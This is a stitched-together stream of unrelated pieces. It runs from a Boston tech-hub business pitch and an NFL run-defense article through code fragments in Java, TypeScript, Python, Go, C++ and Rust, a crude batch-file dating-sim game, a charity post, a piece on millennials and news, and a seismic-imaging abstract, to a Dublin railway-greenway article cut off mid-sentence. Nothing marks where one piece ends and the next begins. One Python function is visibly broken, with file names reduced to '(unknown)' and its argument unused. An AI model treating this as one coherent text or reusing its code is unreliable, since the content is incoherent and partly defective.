We are three IT professionals with experience in programming, server management, storage, security, networking, web hosting, car audio installation, food preparation and restaurant management. We would like to start a business in Boston where IT professionals, students and anyone interested in technology can come together to work, receive help, eat, relax and network with others who share the same interests. In addition, we will provide video gaming space, movie space and recreation space. We envision technology-themed rooms and environments with workspaces, meeting rooms, cubicles and just about any setup an IT person would desire. We will also have food and refreshments available and host events such as vendor days, professional days for potential employment and college open houses for prospective students. In addition to these events, we will hold classes to help anyone interested in learning about technology topics. In conclusion, we want to create a great place for all who enjoy technology: a central hub in the Boston area where people can come to relax, get things done and build a network.
Through five games, it’s been a struggle defensively for the Los Angeles Rams. Outside of facing an abysmal Colts offense in Week 1, and limiting the Seahawks to just 241 total yards on Sunday, the Rams’ defense has not been good. It ranks 23rd in points and 20th in yards allowed, while the offense is second and fifth in those departments, respectively. So what’s been the biggest culprit in the Rams’ defensive struggles? Stopping the run, which they’ve been unable to do. Despite the fact that Seattle only rushed for 62 yards on 25 attempts, the Rams are still one of the worst teams when it comes to playing the run. After five games, Los Angeles has surrendered 668 yards on 148 attempts, an average of 4.5 yards per carry. That’s a half-yard more than the Rams are averaging per carry on offense, which is troublesome. No team in the NFL has allowed more rushing touchdowns than the Rams (seven), and only five have given up more yards on the ground. Remember, this is all after they shut down the Seahawks, which means Los Angeles ranked even further down the list prior to Week 5. On the bright side, it’s good to see the Rams are improving in that department, even if it was against a team with a terrible running game and an even worse offensive line. One week after allowing the Cowboys to rush for 189 yards, the Rams clogged up running lanes with the likes of Aaron Donald and Michael Brockers. Mark Barron and Alec Ogletree have played better in recent weeks, too. Barron led the team with 15 tackles on Sunday, making one of the Rams’ six tackles for loss on the day. If Los Angeles can continue to improve its run defense, the entire unit will begin to play better. That’ll be a challenge this week with the NFL’s second-leading rusher, Leonard Fournette, likely carrying the ball 25 times on Sunday.
import java.util.Date;

import org.eclipse.jgit.revwalk.RevCommit;

/** Maps a RevCommit object to a VcsCommit object. */
public class RevCommitMapper {

    public static Commit map(RevCommit revCommit) {
        Commit commit = new Commit();
        commit.setName(revCommit.getName());
        commit.setAuthor(revCommit.getAuthorIdent().getName());
        commit.setComment(revCommit.getShortMessage());
        // getCommitTime() is seconds since the epoch; Date expects milliseconds.
        commit.setTimestamp(new Date(revCommit.getCommitTime() * 1000L));
        return commit;
    }
}
import { Layout } from "antd";
import { NormalizedCacheObject } from "apollo-cache-inmemory";
import ApolloClient from "apollo-client";
import cookie from "cookie";
import Link from "next/link";
import { MouseEvent, PureComponent } from "react";
import * as React from "react";
import { redirect } from "../../utils";
import style from "./Header.scss";

interface IProps {
  name: string;
  client: ApolloClient<NormalizedCacheObject>;
}

export default class Header extends PureComponent<IProps> {
  public render() {
    return (
      <Layout.Header className={style.container}>
        <Link href="/" prefetch={true}>
          <div className={style.logo}>Mobile Payment</div>
        </Link>
        <div className={style.welcome}>
          <span>Hello {this.props.name}</span>,{" "}
          <a href="#" onClick={this.logout}>
            log out
          </a>
        </div>
      </Layout.Header>
    );
  }

  private logout = (e: MouseEvent) => {
    e.preventDefault();
    document.cookie = cookie.serialize("token", "", {
      maxAge: -1 // Expire the cookie immediately
    });
    // Force a reload of all the current queries now that the user is
    // logged out, so we don't accidentally leave any state around.
    this.props.client.cache.reset().then(() => {
      // Redirect to a more useful page when signed out
      redirect("/login");
    });
  };
}
# src/clustering.py
import numpy as np
from sklearn.cluster import MiniBatchKMeans

#
# Constants
#
kmeans_batch_size = 100
n_clusters = 32

#
# HSL <> HHSL methods
#

def hcos_hsin_to_h(hh_array):
    # Recover the hue angle in [0, 1) from its (cos, sin) encoding.
    h_array = []
    for i in range(hh_array.shape[0]):
        cosinus = hh_array[i][0]
        sinus = hh_array[i][1]
        original = np.arccos(cosinus)
        if sinus < 0:
            original = (2 * np.pi) - original
        original = original / (2 * np.pi)
        h_array.append(original)
    return np.array(h_array).reshape(-1, 1)


def hhsl_to_hsl(colors):
    h = hh_cluster_centers_to_h_cluster_centers(colors[:, 0:2])
    s = colors[:, 2].reshape(-1, 1)
    l = colors[:, 3].reshape(-1, 1)
    return np.hstack((h, s, l))


def hsl_to_hhsl(hsl_colors):
    cos_h = np.cos(2 * np.pi * hsl_colors[:, 0])
    sin_h = np.sin(2 * np.pi * hsl_colors[:, 0])
    hh_colors = np.vstack((cos_h, sin_h)).T
    # Scale the radius of the hue circle with the lightness for a bicone shape.
    hh_colors = 2 * np.multiply(
        hh_colors, (0.5 - np.abs(0.5 - hsl_colors[:, 2])).reshape(-1, 1))
    return np.vstack(
        (hh_colors[:, 0], hh_colors[:, 1], hsl_colors[:, 1], hsl_colors[:, 2])).T


def hh_cluster_centers_to_h_cluster_centers(hh_centers):
    # Project the (possibly off-circle) cluster centers back onto the unit
    # circle before decoding them into hue angles.
    circular_hue_center_radii = np.sqrt(
        np.multiply(hh_centers[:, 0], hh_centers[:, 0])
        + np.multiply(hh_centers[:, 1], hh_centers[:, 1]))
    circular_hue_center_radii = np.reshape(circular_hue_center_radii, (-1, 1))
    norm_circular_hue_centers = hh_centers / np.clip(
        circular_hue_center_radii, 0.000000000001, 1)
    norm_circular_hue_centers = np.clip(norm_circular_hue_centers, -1, 1)
    return hcos_hsin_to_h(norm_circular_hue_centers)


# TODO maybe get a measure for how representative the clusters are for the set
# and prune the ones that score lower?

def hhsl_cluster_centers_as_hsl(hsl_colors):
    kmeans_model_hhsl = MiniBatchKMeans(
        n_clusters=n_clusters, batch_size=kmeans_batch_size)
    kmeans_hhsl = kmeans_model_hhsl.fit(hsl_to_hhsl(hsl_colors))
    return hhsl_to_hsl(kmeans_hhsl.cluster_centers_)


def hsl_cluster_centers(hsl_colors):
    kmeans_model_hsl = MiniBatchKMeans(
        n_clusters=n_clusters, batch_size=kmeans_batch_size)
    kmeans_hsl = kmeans_model_hsl.fit(hsl_colors)
    return kmeans_hsl.cluster_centers_
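The point of the (cos h, sin h) encoding above is that hue is circular: hues 0.99 and 0.01 are nearly the same color but far apart numerically, so averaging them directly (as k-means does with its centroids) lands on the wrong side of the wheel. A quick round-trip check of the encoding, using only NumPy:

```python
import numpy as np

# Hues in [0, 1), including values near the wrap-around point.
h = np.array([0.01, 0.25, 0.5, 0.75, 0.99])

# Encode on the unit circle, as hsl_to_hhsl does before the bicone scaling.
cos_h, sin_h = np.cos(2 * np.pi * h), np.sin(2 * np.pi * h)

# Decode, mirroring hcos_hsin_to_h: arccos covers [0, pi]; the sign of sin
# disambiguates the lower half of the circle.
decoded = np.arccos(np.clip(cos_h, -1, 1))
decoded = np.where(sin_h < 0, 2 * np.pi - decoded, decoded) / (2 * np.pi)

print(np.allclose(decoded, h))  # True: the encoding is invertible

# Naive averaging of wrapped hues gives 0.5 (the opposite side of the wheel),
# while averaging the (cos, sin) pairs and decoding stays near the true hue.
wrapped = np.array([0.01, 0.99])
naive_mean = wrapped.mean()  # 0.5, far from both red-ish inputs
```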
SecondLie wants you to hate cancer. SecondLie, the premier Second Life Twitter parody account, is raising money for cancer research as a part of the broader Relay For Life campaign. If you’re a Second Life user, click the ‘love’ button on SecondLie’s post by the end of the month, and he (and 19 others) will donate one cent each towards cancer research. That’s currently 20 cents each time someone clicks, up to a limit of 10,000 loves on the post. (UPDATE: Now 40 US cents per love) Hating cancer requires nothing from you, other than a mouse-click. Surely, you can hate cancer enough to lift one finger. Actually, even if you hate SecondLie more than you hate cancer, you can add your love to the post and cost him some money. So, win-win, right?
import json

import pandas as pd


def save_to_csv(filename):
    # NOTE: `filename` is accepted but unused here; the file-name templates
    # below appear truncated to "(unknown)" in the source.
    with open(f'(unknown)_match_data.txt', 'r') as f:
        data = f.read()
    new_data = []
    for elem in data.split('\n'):
        # The source lines use single quotes; json.loads needs double quotes.
        string = elem.replace("'", "\"")
        try:
            new_data.append(json.loads(string))
        except json.JSONDecodeError:
            # Skip blank or malformed lines.
            pass
    dataframe = pd.DataFrame(new_data)
    dataframe.to_csv(f'(unknown).csv', index=False)
Don’t get me wrong, I’m sure there is a valid reason why Cyclops and Wolverine are going at it in the newly released image for X-Men: Schism, but in my heart of hearts, I like to think that Hannah Montana had something to do with it. Even if it’s a little part. Today’s Best-of-Friends page was done by Guy Allen, whose new portfolio site is now up and running: Guy Allen is an illustrator/designer working professionally in the field for over 4 years. A graduate of the College for Creative Studies in Detroit, MI, Guy majored in Illustration, while simultaneously having “on the side” relationships with Industrial and Graphic Design. Guy’s past work can be seen in many places, including print, web and too many commercials to count; from automotive to baked beans, Guy has done them all and has a client list to prove it. Enjoy new comic day, folks, we’ll see you back here on Friday. -sohmer
package main

import (
	"net/http"

	"github.com/gorilla/mux"
)

// enableCors adds permissive CORS headers to every REST response.
func enableCors(w http.ResponseWriter) {
	headers := w.Header()
	headers.Add("Access-Control-Allow-Origin", "*")
	headers.Add("Vary", "Origin")
	headers.Add("Vary", "Access-Control-Request-Method")
	headers.Add("Vary", "Access-Control-Request-Headers")
	headers.Add("Access-Control-Allow-Headers", "Content-Type, Origin, Accept, token")
	headers.Add("Access-Control-Allow-Methods", "GET, POST, OPTIONS")
}

// InitRestHandler wires up the supported REST routes.
func InitRestHandler(g *Game) {
	prefix := "rest"
	router := mux.NewRouter()
	router.PathPrefix(prefix)

	router.HandleFunc("/"+prefix+"/health", func(w http.ResponseWriter, r *http.Request) {
		enableCors(w)
		w.WriteHeader(http.StatusOK)
		w.Write([]byte("Service Online"))
	}).Methods("GET")

	router.HandleFunc("/"+prefix+"/player/register/", func(w http.ResponseWriter, r *http.Request) {
		enableCors(w)
		registerPlayerHandler(w, r, g)
	}).Methods("POST")

	router.HandleFunc("/"+prefix+"/player/unregister/", func(w http.ResponseWriter, r *http.Request) {
		enableCors(w)
		unregisterPlayerHandler(w, r, g)
	}).Methods("POST")

	// Answer CORS preflight requests for all routes.
	router.Methods("OPTIONS").HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		enableCors(w)
		w.WriteHeader(http.StatusOK)
	})

	http.Handle("/", router)
}

type _RegisterPlayerBody struct {
	Name string `json:"name"`
}

type _RegisterPlayerResponse struct {
	ID       string `json:"id"`
	PseudoID string `json:"pseudoID"`
}

func registerPlayerHandler(w http.ResponseWriter, req *http.Request, g *Game) {
	var body _RegisterPlayerBody
	if err := ReadBytesFromBody(req.Body, &body); err != nil {
		SendErrorResponse(w, err)
		return
	}

	name := body.Name
	if _, err := IsStringEmpty(name); err != nil {
		SendErrorResponse(w, err)
		return
	}

	id, err := CreatePlayerID(name)
	if err != nil {
		CatchError("Unable to register new player", err)
		SendErrorResponse(w, err)
		return
	}

	// Ask the game loop whether this player is already registered.
	var isExisting = make(chan bool)
	g.hasPlayer <- PlayerExistsMessage(id, isExisting)
	if <-isExisting {
		SendErrorResponse(w, NewError("Player already exists"))
		return
	}

	pseudoID, err := CreatePseudoPlayerID(id)
	if err != nil {
		SendErrorResponse(w, err)
		return
	}

	g.send <- AddPlayerMessage(id, pseudoID, name)
	SendResponse(w, _RegisterPlayerResponse{
		ID:       id,
		PseudoID: pseudoID,
	})
}

func unregisterPlayerHandler(w http.ResponseWriter, req *http.Request, g *Game) {
	var body _RegisterPlayerResponse
	if err := ReadBytesFromBody(req.Body, &body); err != nil {
		SendErrorResponse(w, err)
		return
	}

	var id = body.ID
	if _, err := IsStringEmpty(id); err != nil {
		SendErrorResponse(w, err)
		return
	}

	g.send <- RemovePlayerMessage(id)
	SendResponse(w, nil)
}
Generic Dating Sim 2000 V0.0.1
gamesinabit, Nov 4th, 2014

@echo off
title GDS2000
color 70
set /a days=0
set /a endingsunlocked=0
set /a peoplemet=0
set /a friends=0
echo -----------------------------------------
echo ---------GENERIC DATING SIM 2000---------
echo -----------by nobody important-----------
echo -----------------------------------------
pause
cls
goto :menu

:menu
cls
echo MAIN MENU
echo ---------
echo Type 'Play' to play
echo Type 'Close' to close the window
echo Type 'Continue' to access the password screen
set /p input=
if %input%==Play goto :tutorialorgame
if %input%==play goto :tutorialorgame
if %input%==Close exit
if %input%==close exit
if %input%==Continue goto :password
if %input%==continue goto :password
if not %input%==no goto :error

:error
cls
echo COMMAND INCORRECT
pause
cls
echo RETURNING TO MENU
pause
goto :menu

:password
cls
set /p pass=Enter the password:
if %pass%==upupdowndownleftrightleftrightbastart goto :konamicode
if %pass%==upupdowndownleftrightleftrightBAstart goto :konamicode
if %pass%==uuddlrlrbastart goto :konamicode
if %pass%==uuddlrlrBAstart goto :konamicode
if %pass%==F5redA6red goto :tobeadded
if %pass%==lelbot goto :freakedn1PASS
if not %pass%==none goto :wrongpass

:wrongpass
cls
echo That's an incorrect password.
echo Returning to the main menu.
pause
goto :menu

:tobeadded
cls
echo GENERIC DATING SIM 2000 IS STILL IN DEVELOPMENT, SO SOME SECTIONS OF THE GAME ARE GOING TO BE AVALIBLE IN FUTURE VERSIONS.
pause
cls
echo RETURNING TO THE MAIN MENU
pause
goto :menu

:konamicode
cls
pause
echo ...
pause
cls
echo What did you expect? A fucking fanfare?
echo Too bad, this can't transmit sound.
pause
cls
echo Anyway, this will alter some stuff ingame, so enter:
echo "F5redA6red" at the password screen
pause
cls
echo RETURNING TO THE MENU
pause
goto :menu

:tutorialorgame
cls
echo Would you like to see the tutorial?
set /p tutyn=Y/N?
if %tutyn%==Y goto :tutorial
if %tutyn%==N goto :day0
if %tutyn%==y goto :tutorial
if %tutyn%==n goto :day0

:tutorial
cls
echo In GDS2000, you will be asked to enter a letter or word in order to progress.
echo When this section comes up, you must enter exactly what it asks you to enter for your desired option.
pause
cls
echo If you enter an answer that wasn't made to progress the story, you will be sent to a screen like this:
pause
cls
goto :errortutorial

:errortutorial
cls
echo COMMAND INCORRECT
pause
cls
echo RETURNING TO [section]
pause
goto :tutorial2

:tutorial2
cls
echo Or some variation of that.
pause
cls
echo There will be passwords throughout the game that are used to save progress such as:
echo Number of days/nights
echo Relationships
echo Amount of endings unlocked
echo etc.
pause
cls
echo Please enjoy the game.
pause
goto :day0

:day0
cls
set /p name=What is your name?
cls
color 71
echo --------???--------
echo %name%!
pause
cls
set /a peoplemet+=1
echo --------lelbot420--------
echo Welcome to Weird Shit High!
echo I'll be your friend who you some how know.
pause
cls
set /a friends+=1
echo --------lelbot420--------
echo In WSH, you'll encounter humans, birds, and gigantic monsters.
echo I myself have had me boat rocked by Cthulhu if you know what I mean.
pause
cls
color 72
set /a peoplemet+=1
echo --------Cthulhu--------
echo WHERE THE HELL HAVE YOU BEEN?
pause
cls
color 71
echo --------lelbot420--------
echo WHY DOES IT MATTER TO YOU? IT'S NOT LIKE I'LL CHEAT ON YOU, NO MATTER HOW SMALL YOUR...
pause
cls
color 70
echo As your human friend and his gargantuan lover begin to argue, you can't help but let your mind drift off.
echo Where will you live?
echo Who will you live with?
echo Oh yeah, you got your own room.
pause
cls
echo Some time passes...
pause
cls
color 78
echo Some time...
pause
cls
color 07
echo passes.
pause
goto :n1

:n1
cls
set /a days+=1
echo ---TIME 10:00PM---
echo Type 'stats' to see your current statistics
echo Type 'games' to select a video game to play
echo Type 'food ' to make food
echo Type 'club' to go to some club
echo Type 'library' to go to the library
set /p night1=What will you do on your first night here?
if %night1%==stats goto :gamestatsn1
if %night1%==games goto :gamesnight1
if %night1%==food goto :foodnight1
if %night1%==club goto :clubnight1
if %night1%==library goto :librarynight1
if not %night1%==none goto :n1error

:gamestatsn1
cls
echo Endings unlocked: %endingsunlocked%
echo Number of people met: %peoplemet%
echo Days complete: %days%
echo Friends: %friends%
pause
goto :n1

:n1error
cls
echo You either entered a non existing command on night 1,
echo or entered an existing command wrong.
pause
cls
echo Returning to night 1...
pause
goto :n1

:gamesnight1
cls
echo You look at your selection...
pause
cls
echo Type 'Lonk' to play Legend of Lonk: Ahcarono of Tim
echo Type 'Sanic' to play Sanic the Heghoog 2016
echo Type 'TF2' to play Team Fortress 2
set /p gaming1=What will you play?
if %gaming1%==Lonk goto :lonk1
if %gaming1%==Sanic goto :sanic1
if %gaming1%==TF2 goto :tf21
if not %gaming1%==nogame goto :n1error

:tf21
cls
echo There's no internet where you are for some reason.
echo When you get up to check your router, you hear a knock on your door.
pause
goto :end1

:end1
cls
echo You go to your dorm's door, but are feeling worried about what's on the other end.
echo Will you
echo Run? (Type "Run")
echo Open the door (Type "Open")
set /p end1input=What will you do?
if %end1input%==Run goto :end1run
if %end1input%==Open goto :end1open
if %end1input%==error goto :end1error

:end1error
cls
echo Apparently you didn't input a correct command.
pause
cls
echo Returning to last screen...
pause
goto :end1

:end1run
cls
echo You attempt to move, but are frozen with fear.
echo The door suddenly slams open with your friend standing on the other side is confused to see you staring with wide eyes.
pause
cls
color 01
echo --------lelbot420--------
echo Are you okay, %name%?
pause
cls
color 07
echo "I'm just freaked out." (type a1)
echo "Y...yes." (type a2)
set /p end1r=What do you say?
if %end1r%==a1 goto :freakedn1
if %end1r%==a2 goto :yesansn1

:freakedn1PASS
cls
set /p name=What's your name again? I forgot...
cls
echo Oh, that's right! It's %name%!
pause
goto :freakedn1

:freakedn1
cls
color 01
echo --------lelbot420--------
echo Why?
pause
cls
color 07
echo --------%name%--------
echo I'm not sure.
pause
cls
echo You are envoloped in darkness, and you feel every inch of it seeping into your skin.
pause
cls
color 80
echo It̥ ͑hurts͢
pause
cls
color 08
echo Please͇ ̂ṡțo᷿p̍ ̚it̃!̈
pause
cls
color 70
echo You got the ending: OUT OF NOWHERE FILLER ENDING
set /a endingsunlocked+=1
echo Enter "OoNFE01restart" on the password screen to restart with this ending already unlocked!
pause
goto :finalresults

:sanic1
cls
echo You go fast like Sanic.
pause
cls
echo You realize it's getting pretty late, so you turn off your interactive furry experiance
echo and go to bed.
pause
cls
color 80
pause
cls
color 70
pause
goto :day1nogame

:lonk1
cls
echo You put "Legend of Lonk: AoT" into your Nintendo 69.
pause
cls
echo You're up pretty late...
pause
cls
color 80
pause
cls
color 70
pause
goto :day1nogame

:day1nogame
cls

:foodnight1
:clubnight1
:librarynight1

:finalresults
cls
echo FINAL RESULTS FOR %name%
echo ------------------------------
echo Chatacters met: %peoplemet%
echo Endings unlocked so far: %endingsunlocked%
echo Days completed: %days%
pause
cls
echo Thank you for playing!
pause
goto :menu
/**
 * Format a key's statistic cache hashmap for convenient OfflineSlot storage.
 *
 * @param o a HashMap which should have keys: key, dimension, and a bunch of variables
 * @return com.threathunter.nebula.slot.offline.OfflineSlotDataObj
 **/
public OfflineSlotDataObj format(final Map o) {
    byte[] key = slotUtils.get_stat_key((String) o.get("key"), (String) o.get("dimension"));
    if (key == null) {
        return null;
    }
    Gson gson = new Gson();
    // Unwrap Mutable values (one level of nesting deep) so Gson serializes plain values.
    for (Object k : o.keySet()) {
        Object v = o.get(k);
        if (v instanceof Mutable) {
            o.put(k, ((Mutable) v).getValue());
        }
        if (v instanceof Map) {
            for (Object vk : ((Map) v).keySet()) {
                Object vv = ((Map) v).get(vk);
                if (vv instanceof Mutable) {
                    ((Map) v).put(vk, ((Mutable) vv).getValue());
                }
            }
        }
    }
    byte[] value = gson.toJson(o).getBytes();
    OfflineSlotDataObj dataObj = new OfflineSlotDataObj(key, value);
    return dataObj;
}
/**
 * Periodic code for teleop mode should go here.
 *
 * Users should override this method for code which will be called each time a
 * new packet is received from the driver station and the robot is in teleop
 * mode.
 *
 * Packets are received approximately every 20ms. Fixed loop timing is not
 * guaranteed due to network timing variability and the function may not be
 * called at all if the Driver Station is disconnected. For most use cases the
 * variable timing will not be an issue. If your code does require guaranteed
 * fixed periodic timing, consider using Notifier or PIDController instead.
 */
void IterativeRobot::TeleopPeriodic() {
  static bool firstRun = true;
  if (firstRun) {
    std::printf("Default %s() method... Overload me!\n", __FUNCTION__);
    firstRun = false;
  }
}
Millennials couldn't care less about the news. That's according to the research of University of Texas at Austin journalism professor Paula Poindexter. Young people do not make it a priority to stay informed because they feel that media talks down to them, comes off as propaganda or is just plain boring, Poindexter found. They also think most news media do not cover issues important to them. Some of her findings for her new book, “Millennials, News, and Social Media: Is News Engagement a Thing of the Past?”, include:

- Most millennials give the news media average to failing grades when it comes to reporting on their generation.
- Millennials describe news as garbage, lies, one-sided, propaganda, repetitive and boring.
- When they consume news, millennials are more likely than their baby boomer parents to access news with smartphones and apps and share news through social media, texting and email.
- Most millennials do not depend on news to help with their daily lives.
- The majority of millennials do not feel being informed is important.

Is this a problem? Poindexter worries that in the future no one will be consuming the news, which some consider a citizen's duty. "We can’t continue to ignore the problem," Poindexter said. "The older generation is dying out. Who will be the role model encouraging future generations to be informed?" The Pew Research Center has shown young people overwhelmingly get their news from the Internet, and to an extent from television. Among the various age groups, 18-29 year-olds are the only group to show a significant difference in what type of media they prefer. Poindexter's book lays out more than two dozen best practices for news coverage of millennials, according to a release. Poindexter also created a course titled “Journalism, Society and the Citizen Journalist,” which she hopes will address young people's disengagement.
“The news media, journalism schools and all stakeholders who care about having an informed society in the future must get involved if we are to avoid becoming a nation of news illiterates,” Poindexter said. The Daily Texan, the UT student newspaper, reported on the issue and cited one of its columnists, Douglas Luippold, who agreed that most media don't serve the needs of millennials. The Texan also spoke with UT journalism senior Jena Cuellar, who pointed out an article from the New York Times that begrudged millennials for moving in with their parents after graduating from college. "The [media] is belittling us and talking down [to] us," Cuellar said. "They're not ignoring us, but they're not making us feel good either." There's no shortage of Times articles proving her point. Several articles were run this year about recent college graduates moving back home, citing a statistic that PolitiFact rated as false, but not before Karl Rove's super PAC ran an ad blaming the "boomerang generation" on President Obama. Contrary to the claim repeated by CNN, Time and others (admittedly including The Huffington Post at one point) that 85 percent of recent grads moved back in with mom and dad, the actual rate is closer to 40 percent. Michael J. Rosenfeld, an associate professor of sociology at Stanford University, pointed out on the Times' website that a rate of 40 to 45 percent isn't bad at all compared with historical census data.
//! The main html module which defines components, listeners, and class helpers.

mod classes;
mod component;
mod conversion;
mod listener;

pub use classes::*;
pub use component::*;
pub use conversion::*;
pub use listener::*;

use crate::virtual_dom::VNode;
use std::cell::RefCell;
use std::rc::Rc;
use wasm_bindgen::JsValue;
use web_sys::Node;

/// A type which is expected as a result of a `view` function implementation.
pub type Html = VNode;

/// Wrapped Node reference for later use in Component lifecycle methods.
///
/// # Example
/// Focus an `<input>` element on mount.
/// ```
/// use web_sys::HtmlInputElement;
/// # use yew::prelude::*;
///
/// pub struct Input {
///     node_ref: NodeRef,
/// }
///
/// impl Component for Input {
///     type Message = ();
///     type Properties = ();
///
///     fn create(_: Self::Properties, _: ComponentLink<Self>) -> Self {
///         Input {
///             node_ref: NodeRef::default(),
///         }
///     }
///
///     fn rendered(&mut self, first_render: bool) {
///         if first_render {
///             if let Some(input) = self.node_ref.cast::<HtmlInputElement>() {
///                 input.focus();
///             }
///         }
///     }
///
///     fn change(&mut self, _: Self::Properties) -> ShouldRender {
///         false
///     }
///
///     fn update(&mut self, _: Self::Message) -> ShouldRender {
///         false
///     }
///
///     fn view(&self) -> Html {
///         html! {
///             <input ref={self.node_ref.clone()} type="text" />
///         }
///     }
/// }
/// ```
/// ## Relevant examples
/// - [Node Refs](https://github.com/yewstack/yew/tree/master/examples/node_refs)
#[derive(Default, Clone)]
pub struct NodeRef(Rc<RefCell<NodeRefInner>>);

impl PartialEq for NodeRef {
    fn eq(&self, other: &Self) -> bool {
        self.0.as_ptr() == other.0.as_ptr() || Some(self) == other.0.borrow().link.as_ref()
    }
}

impl std::fmt::Debug for NodeRef {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        write!(
            f,
            "NodeRef {{ references: {:?} }}",
            self.get().map(|n| crate::utils::print_node(&n))
        )
    }
}

#[derive(PartialEq, Debug, Default, Clone)]
struct NodeRefInner {
    node: Option<Node>,
    link: Option<NodeRef>,
}

impl NodeRef {
    /// Get the wrapped Node reference if it exists
    pub fn get(&self) -> Option<Node> {
        let inner = self.0.borrow();
        inner.node.clone().or_else(|| inner.link.as_ref()?.get())
    }

    /// Try converting the node reference into another form
    pub fn cast<INTO: AsRef<Node> + From<JsValue>>(&self) -> Option<INTO> {
        let node = self.get();
        node.map(Into::into).map(INTO::from)
    }

    /// Wrap an existing `Node` in a `NodeRef`
    pub(crate) fn new(node: Node) -> Self {
        let node_ref = NodeRef::default();
        node_ref.set(Some(node));
        node_ref
    }

    /// Place a Node in a reference for later use
    pub(crate) fn set(&self, node: Option<Node>) {
        let mut this = self.0.borrow_mut();
        this.node = node;
        this.link = None;
    }

    /// Link a downstream `NodeRef`
    pub(crate) fn link(&self, node_ref: Self) {
        // Avoid circular references
        if self == &node_ref {
            return;
        }
        let mut this = self.0.borrow_mut();
        this.node = None;
        this.link = Some(node_ref);
    }

    /// Reuse an existing `NodeRef`
    pub(crate) fn reuse(&self, node_ref: Self) {
        // Avoid circular references
        if self == &node_ref {
            return;
        }
        let mut this = self.0.borrow_mut();
        let existing = node_ref.0.borrow();
        this.node = existing.node.clone();
        this.link = existing.link.clone();
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::utils::document;

    #[cfg(feature = "wasm_test")]
    use wasm_bindgen_test::{wasm_bindgen_test as test, wasm_bindgen_test_configure};

    #[cfg(feature = "wasm_test")]
    wasm_bindgen_test_configure!(run_in_browser);

    #[test]
    fn self_linking_node_ref() {
        let node: Node = document().create_text_node("test node").into();
        let node_ref = NodeRef::new(node.clone());
        let node_ref_2 = NodeRef::new(node.clone());

        // Link to self
        node_ref.link(node_ref.clone());
        assert_eq!(node, node_ref.get().unwrap());

        // Create cycle of two node refs
        node_ref.link(node_ref_2.clone());
        node_ref_2.link(node_ref);
        assert_eq!(node, node_ref_2.get().unwrap());
    }
}
package com.marckregio.firebasemakunat.model;

/**
 * Created by eCopy on 9/29/2017.
 */
public class SampleModel {

    public final static String USERID = "userid";
    public final static String NAME = "name";
    public final static String NUMBER = "number";

    private String userid;
    private String name;
    private String number;

    public SampleModel() {
        // Default constructor required for Firebase deserialization
    }

    public SampleModel(String userid, String name, String number) {
        this.userid = userid;
        this.name = name;
        this.number = number;
    }

    public String getUserid() {
        return userid;
    }

    public String getName() {
        return name;
    }

    public String getNumber() {
        return number;
    }
}
3‐D S Wave Imaging via Robust Neural Network Interpolation of 2‐D Profiles From Wave‐Equation Dispersion Inversion of Seismic Ambient Noise

Ambient noise seismic data are widely used by geophysicists to explore subsurface properties at crustal and exploration scales. A two-step dispersion-inversion scheme is the dominant method used to invert the surface wave data generated by cross-correlating ambient noise signals. However, two-step methods rest on a 1-D layered-model assumption, which does not account for complex wave propagation. To overcome this limitation, we employ a 2-D wave-equation dispersion (WD) inversion method that reconstructs the subsurface shear (S) velocity model in one step, using elastic wave-equation modeling to simulate the subsurface wave propagation. In the WD method, the optimal S velocity model is obtained by minimizing the difference between the dispersion curves of the observed and predicted surface wave data, which makes the WD method less prone to getting stuck in local minima. In our study, the observed Scholte waves are generated by cross-correlating continuous ambient noise signals recorded by each ocean bottom node (OBN) in the 3-D Gorgon OBN survey, Western Australia. For every two OBN lines, the WD method is used to retrieve the 2-D S velocity structure beneath the first line. We then use a robust neural network (NN)-based method to interpolate the inverted 2-D velocity slices into a continuous 3-D velocity model and to generate a corresponding uncertainty model. Finally, we compare the predicted dispersion curves and waveforms to the observed data and find a robust waveform and dispersion match across all of the Gorgon OBN lines.
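The abstract describes the NN interpolation step only at a high level. As a hedged illustration (not the authors' architecture — the network size, training scheme, and the synthetic "slice" data below are all assumptions for demonstration), a minimal NumPy sketch of the idea — fit a small neural network that maps (x, y, z) coordinates to S velocity from sparse slice samples, then evaluate it on a dense 3-D grid — could look like:

```python
import numpy as np

rng = np.random.default_rng(0)

# Synthetic stand-in for inverted 2-D slices: sparse velocity samples at
# (x, y, z) points (y = line position).  Velocity increases with depth z.
pts = rng.uniform(0.0, 1.0, size=(500, 3))
vel = 1.5 + 2.0 * pts[:, 2] + 0.1 * np.sin(2 * np.pi * pts[:, 0])

# One-hidden-layer MLP: v(x, y, z) ~ W2 . tanh(W1 @ p + b1) + b2
H = 32
W1 = rng.normal(0.0, 1.0, (H, 3)); b1 = np.zeros(H)
W2 = rng.normal(0.0, 0.1, H);      b2 = 0.0

def forward(p):
    h = np.tanh(p @ W1.T + b1)            # hidden activations, shape (N, H)
    return h @ W2 + b2, h

lr = 0.05
for _ in range(2000):                     # plain gradient descent on MSE
    pred, h = forward(pts)
    err = pred - vel                      # shape (N,)
    gW2 = h.T @ err / len(err); gb2 = err.mean()
    dh = np.outer(err, W2) * (1 - h**2)   # backprop through tanh
    gW1 = dh.T @ pts / len(err); gb1 = dh.mean(axis=0)
    W2 -= lr * gW2; b2 -= lr * gb2
    W1 -= lr * gW1; b1 -= lr * gb1

# Evaluate on a dense 3-D grid -> a continuous interpolated velocity volume
g = np.linspace(0.0, 1.0, 20)
X, Y, Z = np.meshgrid(g, g, g, indexing="ij")
grid = np.column_stack([X.ravel(), Y.ravel(), Z.ravel()])
volume = forward(grid)[0].reshape(20, 20, 20)
```

The paper's robust version additionally produces an uncertainty volume; one common way to approximate that in a sketch like this would be to train an ensemble of such networks from different random seeds and take the per-voxel spread of their predictions.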
def supports_protein(): pass
A dirt track leads through scrub grass, rubble, and weeds. To my right, a few dilapidated industrial buildings lie unoccupied. To my left, mounds of overgrown foliage overshadow the path; beyond them runs a line of track that used to shuttle trains to Sligo and Maynooth. This is wasteland by most people’s definition, although Kaethe Burt-O’Dea, a healthcare design consultant and “urban ecologist”, sees things differently. Burt-O’Dea last year received a Guinness Projects Award to help plan the conversion of this deserted train line from Broombridge in Cabra to Broadstone Station into a green sanctuary and cultural landmark. She points to a large pile of concrete rubble. “Those are the remains of the platform,” she says. “They’ve thrown it around, but that was the stop for the steam train. It ran this line until the 1960s.” This scrubland will mark the terminus for the new Luas Cross City extension traversing the city centre. That development, approved in 2012, has been seen as a long-overdue boost for the economy of the northside. Official announcements herald it as “an opportunity for substantial development and rejuvenation of an important inner-city urban quarter”. It is also the site for the Lifeline, 